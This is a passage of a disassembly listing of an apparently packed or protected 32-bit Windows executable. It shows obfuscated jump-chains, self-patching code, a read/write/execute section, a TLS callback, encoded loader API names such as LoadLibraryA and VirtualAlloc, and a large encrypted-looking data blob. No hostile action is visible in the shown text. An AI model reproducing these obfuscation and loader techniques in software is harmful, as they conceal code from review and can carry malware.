; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_45B7EE:				; CODE XREF: sub_44BEBB:loc_448AF7j
		mov	[edx], ebp
		add	edx, eax
		jmp	loc_447442
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------

loc_45B7F7:				; CODE XREF: hvvrg7ie:loc_44EA57j
		push	esi
		mov	esi, ebp
		xchg	esi, [esp]
		push	eax
		jmp	loc_45751B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450E01

loc_45B803:				; CODE XREF: sub_450E01:loc_442D01j
					; hvvrg7ie:00442D13j
		xor	ebx, 16049F16h
		sub	ebx, 2289BB87h
		and	ebx, 32A7FFD4h
		add	ebx, 0CE2254FBh
		xchg	ebx, [esp+0]
		jmp	loc_4515CC
; END OF FUNCTION CHUNK	FOR sub_450E01
; ---------------------------------------------------------------------------
		push	0BF795C9Eh
		pushf
		jmp	sub_43B5E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_45B82E:				; CODE XREF: sub_43E063+187E8j
		jnz	loc_456774
		jmp	loc_454C54
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------

loc_45B839:				; CODE XREF: hvvrg7ie:004571F7j
		not	ebx
		sub	edi, 73F04F78h
; START	OF FUNCTION CHUNK FOR sub_45A91B

loc_45B841:				; CODE XREF: sub_45A91B:loc_4571E6j
		xor	eax, 8619FF79h
		call	sub_450C5A
		mov	ds:off_41D154, eax
		lea	eax, sub_45A91B
		push	offset sub_444126
		jmp	nullsub_472
; END OF FUNCTION CHUNK	FOR sub_45A91B

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_45B862	proc near		; CODE XREF: sub_4589A2:loc_44CE1Dj
		retn
sub_45B862	endp


; =============== S U B	R O U T	I N E =======================================



sub_45B863	proc near		; DATA XREF: sub_44A91A+6B5Eo

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043940E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043F9B0 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004451DA SIZE 00000003 BYTES

		xchg	edi, [esp+0]
		push	68E65438h
		pop	edx
		rol	edx, 11h
		xor	edx, 392E7B13h
		add	edx, ecx
		push	esi
		push	0D6A465B3h
		jmp	loc_43F9B0
sub_45B863	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45B882:				; CODE XREF: hvvrg7ie:00459935j
		jp	sub_44E609

; =============== S U B	R O U T	I N E =======================================



sub_45B888	proc near		; CODE XREF: sub_45A234:loc_451850p

; FUNCTION CHUNK AT 0044B620 SIZE 00000011 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	0FA681913h
		pop	eax
		sub	eax, 6B456D8Ch
		js	loc_44B620

loc_45B89E:				; CODE XREF: sub_449D53+116Cj
		jmp	nullsub_473
sub_45B888	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		add	ebx, esi
		jmp	loc_44E66D
; ---------------------------------------------------------------------------
		xor	ebx, esi
		jmp	sub_45943A

; =============== S U B	R O U T	I N E =======================================



sub_45B8B1	proc near		; CODE XREF: hvvrg7ie:0043AADEj
					; hvvrg7ie:0043CAB1p

; FUNCTION CHUNK AT 0045B42C SIZE 00000011 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	edx
		push	0EF4D8554h
		pop	edx
		add	edx, 6FC70260h
		jmp	loc_45B42C
sub_45B8B1	endp

; ---------------------------------------------------------------------------

loc_45B8C7:				; CODE XREF: hvvrg7ie:00446601j
		xor	edi, ds:4000F6h
		and	edi, 0B05D76FBh
		add	edi, 0FFE47B21h
		mov	[edi], eax
		jmp	loc_43BC6A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_238. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45B8E1:				; CODE XREF: hvvrg7ie:0044DF24j
		add	esi, 5F2F8F4Dh
		xchg	esi, [esp]
		jmp	loc_44EC11
; ---------------------------------------------------------------------------

loc_45B8EF:				; CODE XREF: hvvrg7ie:004409FBj
		xor	edi, 0F978EBCFh
		test	edi, 80000000h
		jmp	loc_44B690
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B6DB

loc_45B900:				; CODE XREF: sub_45B6DB:loc_447EC7j
		mov	ebp, eax
		xchg	ebp, [esp+2CCh+var_2CC]
		call	sub_43EB47
; END OF FUNCTION CHUNK	FOR sub_45B6DB
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_45B90A:				; CODE XREF: sub_43E063+D4B1j
		jmp	nullsub_474
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_45B90F:				; CODE XREF: sub_44E3B3-A4F1j
		jmp	loc_44802C
; END OF FUNCTION CHUNK	FOR sub_44E3B3

; =============== S U B	R O U T	I N E =======================================



sub_45B914	proc near		; DATA XREF: sub_44680C+4B5Bo
		lea	eax, nullsub_535
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_535
sub_45B914	endp

; ---------------------------------------------------------------------------
		call	nullsub_494
		jmp	ds:dword_41D14C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_494. PRESS KEYPAD	"+" TO EXPAND]
		dw 0D184h
; ---------------------------------------------------------------------------

loc_45B930:				; CODE XREF: hvvrg7ie:loc_45B930j
		jns	short loc_45B930
; ---------------------------------------------------------------------------
		dw 0E9FFh
		dd 0FFFEB029h

; =============== S U B	R O U T	I N E =======================================



sub_45B938	proc near		; CODE XREF: sub_4443AA:loc_43C15Fj

var_4		= dword	ptr -4

		push	ebx
		mov	ebx, edi
		xchg	ebx, [esp+4+var_4]
		mov	edi, eax
		xchg	edi, [esp+4+var_4]
		ror	eax, 9
		jmp	loc_443700
sub_45B938	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45B94B	proc near		; CODE XREF: sub_44AA5Bj

; FUNCTION CHUNK AT 0044503C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00454BE0 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_454BE0
sub_45B94B	endp

; ---------------------------------------------------------------------------

locret_45B953:				; CODE XREF: hvvrg7ie:0044A386j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_45B954:				; CODE XREF: hvvrg7ie:00445BDBj
					; sub_44388C+CDBBj
		and	eax, 0D1210DB1h
		xor	eax, 11200000h
		popf
		xchg	eax, [esp+0]
		push	10h
		push	0E158E47Dh
		jmp	loc_456E5A
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_45B970:				; CODE XREF: sub_4465A6:loc_44D3CBj
					; hvvrg7ie:0044D3E3j
		and	edx, 0A76C0815h
		xor	edx, 66C0C05h
		xchg	edx, [esp+0]
		lea	eax, [ebp-400h]
		push	eax
		call	sub_447D56
		jmp	loc_454C4F
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E063

loc_45B990:				; CODE XREF: sub_43E063:loc_454C54j
		sbb	ebp, edi
		and	edx, eax

loc_45B994:				; CODE XREF: hvvrg7ie:0043F101j
		jmp	loc_456774
; END OF FUNCTION CHUNK	FOR sub_43E063
; ---------------------------------------------------------------------------

loc_45B999:				; CODE XREF: hvvrg7ie:004441C7j
		jbe	loc_45981D

loc_45B99F:				; CODE XREF: hvvrg7ie:loc_442A95j
		and	esi, 1FDBDA56h
		test	esi, 2
		jmp	loc_44D04A
; ---------------------------------------------------------------------------
		cmp	ebx, 8DFD55F2h
		jmp	loc_44F4A8

; =============== S U B	R O U T	I N E =======================================



sub_45B9BB	proc near		; CODE XREF: sub_44CEC8+8p
					; hvvrg7ie:0045ABB1j

; FUNCTION CHUNK AT 0043C854 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043CEEC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043D8AA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044021C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00444089 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004488A9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A1E1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044AFBA SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044B867 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004508F5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004515EE SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00452D44 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454D66 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00457E8D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459BDD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459CF4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045A9E3 SIZE 0000000D BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+0]
		mov	[ebp-4], eax
		jmp	loc_44021C
sub_45B9BB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 9Ch,	0F6h, 0
		dd 0ED060B3h, 8F4417E5h, 0A651542Ah, 54h, 188h dup(0)
hvvrg7ie	ends

; Section 7. (virtual address 0005C000)
; Virtual size			: 00034000 ( 212992.)
; Section size in file		: 00034000 ( 212992.)
; Offset to raw	data for section: 0005C000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
eu81y7qg	segment	para public 'CODE' use32
		assume cs:eu81y7qg
		;org 45C000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
		db 0CCh
		db 0C0h, 5, 0
		align 8
		dd 0FFFFFFFFh, 5C03Ch, 5C0B4h, 5C108h, 0
		dd 0FFFFFFFFh, 5C0E8h, 5C104h, 5 dup(0)
		dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0
		dd 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h, 6F4C0000h
		dd 694C6461h, 72617262h, 4179h,	65470000h, 6F725074h, 64644163h
		dd 73736572h, 0
		dd 78450000h, 72507469h, 7365636Fh, 73h, 69560000h, 61757472h
		dd 6C6C416Ch, 636Fh, 69560000h,	61757472h, 6572466Ch, 65h
dword_45C0B4	dd 77E79F93h		; DATA XREF: sub_48D968+Dr
					; eu81y7qg:0048EF17r
dword_45C0B8	dd 77E805D8h		; DATA XREF: eu81y7qg:0048EF26r
dword_45C0BC	dd 77E7A5FDh		; DATA XREF: eu81y7qg:0048EF7Dr
dword_45C0C0	dd 77E75CB5h		; DATA XREF: eu81y7qg:00489B90o
					; eu81y7qg:0048BD9Dr ...
dword_45C0C4	dd 77E7980Ah, 77E79E34h, 5C04Ch, 5C060h, 5C070h, 5C084h
					; DATA XREF: sub_48F057+1Eo
		dd 5C094h, 5C0A4h, 0
		dd 72657375h, 642E3233h, 6C6Ch,	654D0000h, 67617373h, 786F4265h
		dd 41h
dword_45C104	dd 77D6ADD7h		; DATA XREF: sub_48EFA8+64r
		dd 5C0F4h, 0
TlsDirectory	dd 0
TlsEnd_ptr	dd 0
TlsIndex_ptr	dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsCallbacks
TlsSizeOfZeroFill dd 0
TlsCharacteristics dd 0
TlsIndex	dd 0			; DATA XREF: eu81y7qg:TlsIndex_ptro
TlsCallbacks	dd offset TlsCallback_0	; DATA XREF: eu81y7qg:TlsCallbacks_ptro
		dd 0
; ---------------------------------------------------------------------------
		push	esi
		push	ecx
		mov	esi, eax
		mov	ecx, edx
		sub	ecx, 4
		cld

loc_45C13E:				; CODE XREF: eu81y7qg:0045C155j
		lodsb
		shr	al, 1
		cmp	al, 74h
		jnz	short loc_45C154
		mov	eax, [esi]
		bswap	eax
		add	eax, ecx
		mov	[esi], eax
		add	esi, 4
		sub	ecx, 4

loc_45C154:				; CODE XREF: eu81y7qg:0045C144j
		dec	ecx
		jg	short loc_45C13E
		pop	ecx
		pop	esi
		retn
; ---------------------------------------------------------------------------
		db 8Bh,	0C0h
		dd offset sub_401000
		dd 0C000434Ah, 1, 717E0000h, 0D62820D5h, 421CFFDh, 3D050191h
		dd 398E8842h, 67077FD6h, 57782E8Ah, 0E57CC488h,	0C7806C39h
		dd 74129229h, 4CB0C93Ah, 0D8BF3E90h, 301D626Ah,	3ED489F8h
		dd 880D7A11h, 56124390h, 6717D20Fh, 70A0A965h, 4537C6AFh
		dd 4041846Dh, 61691FCEh, 0FC04DE6Fh, 83B289BAh,	8AEEBB75h
		dd 0C0FFF08h, 6168369Dh, 0EDC982h, 1AA28062h, 0E88EA34h
		dd 0ADD2BB6Ah, 0ABC30B0Fh, 0BCC9C5F3h, 2821A783h, 0E1E32217h
		dd 2B41F0C0h, 99674044h, 0A927E681h, 0F8D5C546h, 318B8980h
		dd 47192C7Dh, 0D1A3570Ah, 2442DCE3h, 1A3E10F2h,	0A5D8A87h
		dd 7B1A5810h, 0DA506F0h, 348B0928h, 8A0ACD35h, 9D5A284Ah
		dd 0FB0810CAh, 0E285AE5Eh, 38289CD1h, 0AF06FB37h, 418632D6h
		dd 9CA8AEE7h, 0E06657F0h, 77DF7E5Ch, 2F18C052h,	0BF012DCBh
		dd 6AD41343h, 12D4CAA1h, 0FD745481h, 5A3440Ch, 27023024h
		dd 0C1DF136Ch, 0B841E937h, 0E09EE30Dh, 0CE3B7165h, 0B3E5B819h
		dd 85437214h, 590AFF20h, 0AC674B1Ah, 0A8D4AC32h, 7E51F557h
		dd 0F88E0306h, 57EB48C8h, 75BA3543h, 1847C6B8h,	9228EF0Ah
		dd 495E017Ch, 25327CD7h, 800A0EFCh, 341152E0h, 0C5DA98DAh
		dd 486AA889h, 8F9820D9h, 0E57CD451h, 40E7EB7Fh,	8DCE185Ah
		dd 0A22937C6h, 53964210h, 695D7272h, 54D908B1h,	21EA08Dh
		dd 2B864DCFh, 1C22A5F9h, 6E799A9h, 4321D404h, 98A632B4h
		dd 0D6897421h, 6D0EF601h, 0D4011F53h, 9502D14Eh, 0CC470360h
		dd 8A7AC968h, 10501D6h,	0EAA0A1C7h, 0F6C207Ah, 98BA5905h
		dd 0F0154B4Ch, 0AA414142h, 0D02D3DF1h, 61782038h, 0A40B6485h
		dd 80F0159Bh, 4B0121Bh,	25196F92h, 0C9CD15A4h, 0A33AD9B6h
		dd 72BEFA28h, 46919463h, 12023CEDh, 0E8804643h,	0A229983Bh
		dd 254F5D94h, 822CCA19h, 0BD701B56h, 0A03D4546h, 912922BDh
		dd 40FB3803h, 0A5AA5844h, 7CFAE4EBh, 0BD491533h, 3620899Eh
		dd 0A051A6D2h, 859BC1D2h, 0D7D45053h, 0ADFBE0ADh, 287CE3ABh
		dd 94692CC8h, 14511C58h, 0A583C283h, 0E313FEA4h, 69D9E096h
		dd 15AC69F1h, 3461A205h, 969C1860h, 18B97668h, 1E22B499h
		dd 0A29AC354h, 3EB98230h, 14405128h, 34126A91h,	91518DD2h
		dd 0FE0C8B00h, 0C7A8999Dh, 0D1A3421h, 0AE192C70h, 0F8ABC747h
		dd 33E0855Bh, 0F1B2B3B5h, 0BF614EF8h, 5013B5FFh, 2E984774h
		dd 2140C836h, 4AA1D0B4h, 0A2358C03h, 82E1E387h,	16A773F7h
		dd 0C114F87Eh, 6B3F38A5h, 7ABEB550h, 56533D2Dh,	381AA1EDh
		dd 2ADD1E84h, 0BE2943Fh, 53A56CE4h, 417288D3h, 98868262h
		dd 1BD11659h, 62F1E72h,	1646617Dh, 33719C95h, 0D762CB94h
		dd 9BE9D94Eh, 1B73FF38h, 43CBAC1Ch, 2834E1E7h, 423DFF89h
		dd 9F4A2C62h, 0ACA7259h, 0E65AD503h, 0C4D3DFDFh, 1B699F18h
		dd 52937D9Dh, 0CE194355h, 5625BE15h, 722E6AFFh,	6CD2660Dh
		dd 9351F03Ch, 615014B1h, 6564A023h, 0B1EB16EFh,	0DA62962Fh
		dd 280953Ch, 61E6CBFh, 0E4093140h, 4808318Fh, 0D14A870Ch
		dd 1E2CEE37h, 41B7011Eh, 0EFB16E0Ah, 8FB854FAh,	770A4FA6h
		dd 71887594h, 6A9DA014h, 9CE5A80Ah, 0E7A8C2DDh,	3F46AD8Bh
		dd 0F515FACEh, 61B5F135h, 0F147CBBCh, 4D3799BBh, 0CEE9A317h
		dd 35586AAAh, 9CC0E6Eh,	140892D5h, 80E5815h, 8C27B1B5h
		dd 0F96B29A2h, 860C26EBh, 467860E3h, 6F8AD209h,	0D45D425Ah
		dd 479A8FAh, 68E2C399h,	5912C7E4h, 0ABD58C88h, 0CF5C57F8h
		dd 52EA9E46h, 9EC9E9E5h, 0D998C843h, 395C285Ah,	8D28C167h
		dd 0D69E62C6h, 0B8869457h, 218D4128h, 0CD1827FAh, 3958A0ADh
		dd 16054BA1h, 6C96A3Bh,	481F15BBh, 4C042931h, 13612277h
		dd 89978BB4h, 0B9B80107h, 0CB201A9h, 26EF4846h,	95A8CF47h
		dd 0D5930B99h, 1F20ACC6h, 0A7DF3C3Ch, 0F101D294h, 0D489E263h
		dd 28E4B9FAh, 7D122108h, 0ED1D3976h, 0C915AFF2h, 9CC50463h
		dd 590C9222h, 65839A5Ch, 3E2354FDh, 42B17307h, 981B7570h
		dd 2894C714h, 0F46D4882h, 0C0841460h, 630A2307h, 2E4170C1h
		dd 0B334DD80h, 4AB2CAB0h, 0E0E2387Dh, 0C3D41F95h, 307089F0h
		dd 47282031h, 0C51E552Dh, 3F0EC8EEh, 0DC47334Eh, 5A10D548h
		dd 3A8FDE9Ch, 0F0C08441h, 2B8644DCh, 9CF31207h,	1D4BE81Eh
		dd 1E48A88Fh, 0A045589Ah, 31E9AA3Dh, 18E7EB55h,	688A9766h
		dd 0DC282B55h, 2BC32968h, 26796011h, 0D8E4E536h, 45883077h
		dd 48310F17h, 0E7EF2C8Ah, 0C233859h, 4448FE48h,	80030049h
		dd 649ABEF6h, 9BED30FCh, 4CF0417h, 0C6E1FB91h, 0E050B756h
		dd 31196E3Fh, 1088A9D4h, 3E0ADB80h, 29930EBEh, 0C56E3313h
		dd 6EF502E9h, 5EDDF04Ch, 801E8882h, 0A83D4DA3h,	7A8B8DDh
		dd 4B9D6EE7h, 749043BAh, 0AA79C059h, 6979602Fh,	14489748h
		dd 9D48ECC8h, 9244C3F0h, 0F2C5084Ch, 511B1480h,	9D24427h
		dd 3750AC63h, 0A894BA19h, 0A012809Ch, 4033B0Ch,	9F03A092h
		dd 8D883E69h, 0FEDFD705h, 0A5E84763h, 1278443Ch, 5403376Dh
		dd 0FB40180Ah, 66D57291h, 7D28C341h, 0AB6FB0D3h, 2035206h
		dd 1EABCCB4h, 0D1ABD5Ch, 2860DAD6h, 72800C8Eh, 90C44046h
		dd 2BE02A3Fh, 19489E25h, 46FD5B1h, 5489283Bh, 0FA24F10Bh
		dd 0C5E78C58h, 4AE7411Ch, 4BF84C24h, 2ECC0863h,	8CF4896Bh
		dd 62659C79h, 0FA9A0B48h, 0B839AD33h, 1B111E4Ch, 82D6DAA7h
		dd 8378C82h, 7F802A8Bh,	6A8285B7h, 0B52A9A19h, 0EC720165h
		dd 52A3C4E4h, 4C1DF946h, 0BF963170h, 6FE1AA07h,	0F4BE3754h
		dd 3B805999h, 40B77A65h, 490424B5h, 514CF300h, 0D0270E02h
		dd 0C6655853h, 0EB8861A8h, 3049FB97h, 0A0EC7187h, 0CA426026h
		dd 0D888122Ch, 5250092h, 0AD67E4F3h, 0E5A30125h, 0A0A90E89h
		dd 329BADBEh, 0D5A93B28h, 307EF9A0h, 0A2708B5Eh, 36E1B91Dh
		dd 0EA60072Ah, 1E34E831h, 2FEA1AD4h, 0ACF30D7Fh, 635273B6h
		dd 216769CBh, 27B5E5EEh, 888D8CC7h, 0A2EF011Ah,	49ADD880h
		dd 0F2585E2Dh, 4D5864Dh, 3BA38FD4h, 54056A22h, 0A8716B0h
		dd 35E532CFh, 0C2291316h, 0DAC88AB0h, 4CBC4445h, 0B1818D40h
		dd 9DA327A2h, 22165799h, 4450CE56h, 3F0B0639h, 5A83AB5Ah
		dd 0B1D2D32Dh, 0A83BE2DDh, 8E20BD04h, 2865D32h,	58FC6E45h
		dd 0EE10EB30h, 8F2C907Fh, 9A454B42h, 0F5B81175h, 70224009h
		dd 9888BE33h, 0D75AE22Bh, 2A7864C3h, 8306BE56h,	0D638BAECh
		dd 0C70AD8A5h, 0EB8DA0F8h, 6EC7C1B3h, 0C3AA9A9Ah, 6050E340h
		dd 3CED9141h, 4452D74Ah, 0D6D6A18Ch, 5096617Eh,	7B55C303h
		dd 6AFDFDB6h, 657BBB0Ch, 0B46D6908h, 6ACDD710h,	0DDF8186Dh
		dd 1AB7EBAh, 803BE069h,	9821DF26h, 5B40026Ch, 9A72CFC5h
		dd 5D088436h, 5209216Ch, 52B26FAEh, 183F5D84h, 0ABA4BD7h
		dd 0DFE1E472h, 84239971h, 0A6576F7Ch, 0B5701012h, 7B419282h
		dd 1FB5E916h, 1A641863h, 14007FD7h, 642502E8h, 30242310h
		dd 47D39A6Fh, 9803C421h, 8B894364h, 1CA824CFh, 799EA2FFh
		dd 0FA9B2A6Ah, 94E08AB7h, 0E20CC252h, 0B7DF13E4h, 12CFB31h
		dd 0B786EACh, 8ACAC4EDh, 0FC85DAAAh, 67D8A7B7h,	159A4310h
		dd 36EBE567h, 0DE3E8B16h, 471CEC16h, 0F5BBD5A0h, 9C98A300h
		dd 8A80B8D9h, 2F69C513h, 86ED4C75h, 63CA517Dh, 0D3A41248h
		dd 0A62ED078h, 0A609EDAFh, 0BD339A71h, 0C1C6857Eh, 0E4A8E6D6h
		dd 4FC5B5CFh, 68A97DDEh, 5934ABFFh, 16A0BCB4h, 0C1162440h
		dd 7092D684h
		dd 1CAAE262h, 8D54940h,	24508563h, 0A30B0C68h, 0F630123Fh
		dd 20B46C5Dh, 511452EBh, 0E9E411Ah, 43522726h, 0E7434625h
		dd 0D3038B2h, 1B752AEBh, 0C03C32CDh, 29B59C36h,	114C9E39h
		dd 552075C6h, 0B9C944C4h, 4D6F92C2h, 0E18024B8h, 36AA91A5h
		dd 0D9B42F6Eh, 7D0CC812h, 9EB8798Ah, 0CC18B07h,	850261FDh
		dd 4B12E7C1h, 173EED41h, 505CD0E7h, 8CC085E6h, 2C50231Bh
		dd 80C71681h, 38AD0463h, 0E4028D69h, 0B73AD011h, 7DFC2B46h
		dd 96035D92h, 2FE1F14Ch, 416D8A76h, 4EE683E3h, 0A9245045h
		dd 0C5FA9F05h, 0A843406Eh, 1E11F7F6h, 90AD9518h, 5CAA0C1Eh
		dd 8DF5206Ch, 6379A5D6h, 0E547152Ah, 14038246h,	345245EDh
		dd 6ED8EB08h, 8699A6B0h, 0A445BC62h, 0BD5B8986h, 42536392h
		dd 916C0499h, 5D523E62h, 8B197FCBh, 8A673562h, 8928A36h
		dd 1D2A128Ch, 3D0CC570h, 0D1E0B6Eh, 0A1A44521h,	28DB8DB8h
		dd 91F0811Ah, 42C38A4Eh, 0DB9C278Ah, 52A51630h,	68AAC443h
		dd 0AE0ADFF7h, 8704066Fh, 0CD476091h, 45121DABh, 5000A2C4h
		dd 0A9AE089Ah, 0D8B1E56Dh, 0D2670DF2h, 0A6A68521h, 0A9D4DB58h
		dd 4954C0D0h, 16CB38C0h, 581A34FDh, 8A770BB5h, 4C33A028h
		dd 7EB85543h, 0D3F53518h, 0F40A7E88h, 0C59515C0h, 6B882D52h
		dd 0D0243426h, 2AE231E2h, 72CD50D3h, 3D589523h,	0DDB8BA9Fh
		dd 31216C97h, 51144F54h, 1055D114h, 3A7CC74h, 83EF3E89h
		dd 0F4CA304Bh, 0CAB98A14h, 7397F8BDh, 492977E5h, 289C8DDAh
		dd 71A88D35h, 19EE8DD5h, 0A2A61590h, 699DD81h, 87390CB5h
		dd 1F146054h, 506C018Ah, 21504720h, 61614616h, 2417015Ah
		dd 308174A4h, 1E7C9840h, 0DE2E0E08h, 3D971209h,	64033C36h
		dd 0F896B498h, 5FC84F47h, 61E05264h, 0E23709A0h, 2EB201BEh
		dd 100B6121h, 5BA51673h, 2A719B63h, 60425D64h, 846BE98h
		dd 342A18BEh, 344AEF90h, 0C82CC071h, 8529A168h,	80ECB95h
		dd 9E59B637h, 4110D54Dh, 0B8B37ED4h, 2AB26AC2h,	0D24B64B3h
		dd 8B38CC43h, 71A82A64h, 54E03091h, 0CF39BEC0h,	0F26A3D23h
		dd 0F4561AA6h, 596ACBCBh, 47A0C8B4h, 0ADEB8106h, 0C1519E2Eh
		dd 2E172CA2h, 8D83EB02h, 310D8175h, 9AC6CDA2h, 3D710F8Ah
		dd 7A4BF45h, 0F7DC333h,	3C7A50BBh, 5583187Ah, 5EE0336Bh
		dd 8A67121h, 692E5EDh, 0FC5F61A3h, 212B3A0Dh, 0AD67A2Dh
		dd 1010380Bh, 0D5035D41h, 2F0BDC11h, 0AB075781h, 0E0275536h
		dd 1014CFFFh, 0BB00A7DEh, 80E5CB2Bh, 19A68DFh, 8865F748h
		dd 0D1CD0433h, 709C2EB0h, 4D7AF6C9h, 527D0879h,	24018290h
		dd 6442FD4h, 2B1A6F8Bh,	9945CCA4h, 0B382C23Bh, 3D3415CCh
		dd 31FAEC8Dh, 110FDEBAh, 50A59C10h, 9295C227h, 5235ED43h
		dd 202F210Ah, 11020890h, 84896A24h, 8BAC7C77h, 0A5AF0FFEh
		dd 0C6E26D30h, 495F932Ch, 0DBD75923h, 0DF7518AEh, 0B68A059Ch
		dd 0C61B8623h, 8BB7C435h, 0F5E2308Ah, 85136157h, 0C21AEE70h
		dd 89984DCDh, 979F0BFCh, 0A02FACC4h, 826686D0h,	5DAB7E32h
		dd 4E07D3D7h, 0D5633060h, 50BE5A9Ch, 41C58092h,	0C360E2F9h
		dd 8129F087h, 5E035209h, 2A67F8DFh, 3438F4C7h, 0C472DB7Bh
		dd 13307B7h, 81AC3696h,	3F6E8095h, 0DB258DC4h, 0C702020Eh
		dd 0E064FB83h, 0A4E007B6h, 0AE90C019h, 0D441D41Fh, 0A33D3078h
		dd 40526480h, 0DC69A873h, 2DA0EDE8h, 0F821B450h, 0E72D44CAh
		dd 0C2368066h, 51195354h, 2DB34BB4h, 12464A44h,	1A6E1518h
		dd 7D52B550h, 0A88DD301h, 9B665451h, 70580A0Ah,	2B0EC172h
		dd 1F5B60E8h, 0C60A5AAh, 25FDA9ABh, 0F401243Ah,	50015482h
		dd 5A046329h, 7060CE2h,	434AB489h, 591EB07Ah, 506CD3A3h
		dd 175828A7h, 70B4153Ch, 82E78DA3h, 0D97524C9h,	378C6CA1h
		dd 402CD25Ah, 0F7DC28A4h, 0DFF03406h, 36A1804Dh, 0BB0F0054h
		dd 0CC5D50Ah, 5851E067h, 999C5818h, 2AD9A281h, 0CA2336C5h
		dd 1A3AC456h, 0B7AE4494h, 99400CEAh, 33902C16h,	6AE54EAh
		dd 286DC638h, 0EE428B0Bh, 1B8255B5h, 3013F701h,	12719C71h
		dd 0EB2BBA09h, 0D565BE50h, 8A23CA06h, 49B80F5Eh, 0ED2F8A4h
		dd 0AA8D5101h, 5EEB277Ch, 59A5D240h, 250E4C6Dh,	95596501h
		dd 7AE593E8h, 0EE0148Ch, 0AAFFE0BAh, 0F452D1E8h, 8A82B318h
		dd 0DA3B29EBh, 0A4418834h, 95F08C62h, 4E35B7B6h, 0E05394FFh
		dd 8616120Bh, 9F20F92Eh, 0CB650014h, 13356B02h,	4B02540h
		dd 906596BEh, 6DE0E6C2h, 65A74226h, 10F28C39h, 0B5924900h
		dd 4D44BD58h, 0E55EC9C9h, 0A6AD3F07h, 0A8E97DA8h, 62453C05h
		dd 36625824h, 804280A0h, 0A718FE16h, 0DD88C6E7h, 5A883131h
		dd 491C002h, 0E14D5D5h,	6D37BF25h, 2F61A9BBh, 0BDA00DF9h
		dd 8AA2C47Ch, 0BF11C1D5h, 284BEFC2h, 255F4389h,	30C62F5Eh
		dd 0F3C51276h, 3048E71Dh, 0BC885034h, 558290C0h, 180821ACh
		dd 178EC331h, 47CD5E45h, 62F971A9h, 0ECF6EC8Ch,	0E920F68Eh
		dd 192882B3h, 0B0F5872Fh, 0DB0C62EBh, 878EC094h, 0F19AD37Fh
		dd 363811C0h, 280F50Dh,	0C2CB1E92h, 0B67CC90Fh,	0E1D4D549h
		dd 4849D7E5h, 0DDAF3652h, 756ED23Ch, 0BC3E0555h, 0F570230h
		dd 8C24B450h, 0E2298594h, 35E17928h, 8A4791Eh, 409B6721h
		dd 0CC411Ah, 0F0865E28h, 0ACE9BC44h, 0B0A1E51Dh, 2981CEE6h
		dd 72501C76h, 5E20E0B5h, 0FFFA0C7Eh, 13834F4Fh,	524F6300h
		dd 9E47810Ch, 0AC438C7h, 779445B6h, 0CBCB317Ch,	47405021h
		dd 61B12BD1h, 25E1B95Ah, 0C0FBBAC9h, 27C3DB54h,	0B8472110h
		dd 0FA0025B0h, 5D8C8CA2h, 700A195Eh, 55F92251h,	8B9F6618h
		dd 0AA0B7130h, 1F59CD68h, 0FFD68828h, 0AA16F899h, 8898B1E6h
		dd 0DAA05129h, 7F160548h, 0DA6F0F2Ah, 0CA16C872h, 6E1151D4h
		dd 7A21778Dh, 470A08DDh, 8ACA1778h, 0E213CD72h,	0A651002Dh
		dd 9C0243C8h, 6F109394h, 50B56D7Dh, 6828EAA8h, 0CC48320Ah
